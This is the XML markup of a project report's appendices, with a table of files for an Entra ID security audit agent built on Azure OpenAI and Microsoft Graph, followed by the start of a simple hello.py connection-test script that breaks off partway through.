    <w:p w14:paraId="0A24881E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc243301443"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Appendix C — Files Created During This Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3686AE75" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every file authored specifically for this project (as opposed to files that came from a cloned repository), with its purpose and a short note on its contents.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="92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700"/>
        <w:gridCol w:w="2800"/>
        <w:gridCol w:w="4700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="38B66DF7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67DF83E3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D37CF3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="406D35D1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="17936C9F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49A56ACE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hello.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69FF4503" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 0 — validate the Azure OpenAI connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01077EAD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Single-turn chat completion call to the gpt-5-mini deployment using the openai SDK and python-dotenv for credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="35B566A3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DBAC4F7" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>agent.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5122F55C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 0 — first tool-calling agent pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="452BA067" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A get_current_time(timezone) function exposed as an OpenAI tool, plus a chat loop that lets the model call it and print the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="080B59AB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B2F3F2E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>graph_client.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E977186" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stages 1 &amp; 3 — Microsoft Graph access layer and audit logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02EAE2CC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MSAL client-credential authentication (get_token), a paged Graph GET helper (graph_get), and the audit/enumeration functions: get_users, get_guests, get_global_admins, get_ca_policies, get_mfa_status, get_service_principals, check_legacy_auth_blocked, get_risky_service_principals, check_admin_mfa_policy, get_security_defaults, get_user_owned_objects/devices/groups, get_sp_role_assignments, get_sp_directory_roles, get_role_members</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="37D75741" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="367BB962" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>entra_agent.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4383C147" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stages 2 &amp; 3 — the conversational Entra security agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="309AA5CC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wraps every graph_client.py function as an OpenAI tool definition (REGISTRY + custom-schema tools for parameterized functions), a system prompt enforcing Finding/Risk/Fix/Severity output, and the interactive tool-calling loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="45AD060A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B3B31C7" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08F17EFB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stores runtime secrets, excluded from version control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33A114F0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Azure OpenAI endpoint, key and deployment name; Pearson tenant ID, client ID and client secret for the entra-audit-agent app registration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="44D0089D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19CD9915" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F76803C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Prevents secrets and the virtual environment from being committed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00227430" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Entries for .env and .venv/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BE74B32" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="733CB56C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc243301444"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix D — hello.py (full source)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7B08DE9A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 0 deliverable: validates the Azure OpenAI connection with a single chat completion call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50A937" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cat hello.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="625E2DFE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="177872C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import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D8274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from dotenv import load_dotenv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39682A6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from openai import AzureOpenAI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2FC08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EFA0FB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load_dotenv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A392E4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client = AzureOpenAI(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB0409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azure_endpoint=os.getenv("AZURE_OPENAI_ENDPOINT"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA9C30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api_key=os.getenv("AZURE_OPENAI_KEY"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DACDBC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api_version="2025-04-01-preview",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B777BF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31DC82E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MODEL = os.getenv("AZURE_OPENAI_DEPLOYMENT")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7397E58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254E9DE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response = client.chat.completions.create(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="540B8F3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model=MODEL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A81051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messages=[</w:t>
            </w:r>
          </w:p>
